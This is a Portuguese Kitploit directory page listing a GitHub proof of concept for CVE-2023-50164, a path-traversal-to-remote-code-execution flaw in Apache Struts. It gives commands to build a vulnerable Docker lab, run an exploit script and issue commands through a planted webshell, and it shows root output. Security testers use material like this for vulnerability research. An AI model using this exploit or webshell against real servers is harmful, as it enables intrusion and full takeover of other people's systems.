Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-50164-PoC — CVE-2023-50164 (vulnerabilidade de path traversal para RCE no Apache Struts) - Prova de Conceito | Kitploit
Ferramentas/GitHubGitHub/sunnyvale-it/cve-2023-50164-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubsunnyvale-it/cve-2023-50164-poc

CVE-2023-50164-PoC

CVE-2023-50164 (vulnerabilidade de path traversal para RCE no Apache Struts) - Prova de Conceito

Ver Repositório
21há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-50164 (Vulnerabilidade de path traversal para RCE no Apache Struts) - Prova de Conceito

Esta PoC foi criada para testar uma RCE (Execução Remota de Código) explorando a vulnerabilidade do Apache Struts2.

Construa a imagem e execute um container:

root@kitploit:~
$ DOCKER_BUILDKIT=1 docker build  . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc

Execute o exploit:

root@kitploit:~
$ cd exploit
$ ./exploit.sh

Agora você pode executar comandos arbitrários no lado do servidor, conforme mostrado:

root@kitploit:~
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a  

uid=0(root) gid=0(root) groups=0(root)

Créditos

  • Agradecimentos a @jakabakos por um exemplo de aplicação vulnerável (https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE)
  • Agradecimentos a Zscaler ThreatLabz (https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-50164-apache-struts-path-traversal-and-file) pelo diagrama acima
  • Baixar ferramenta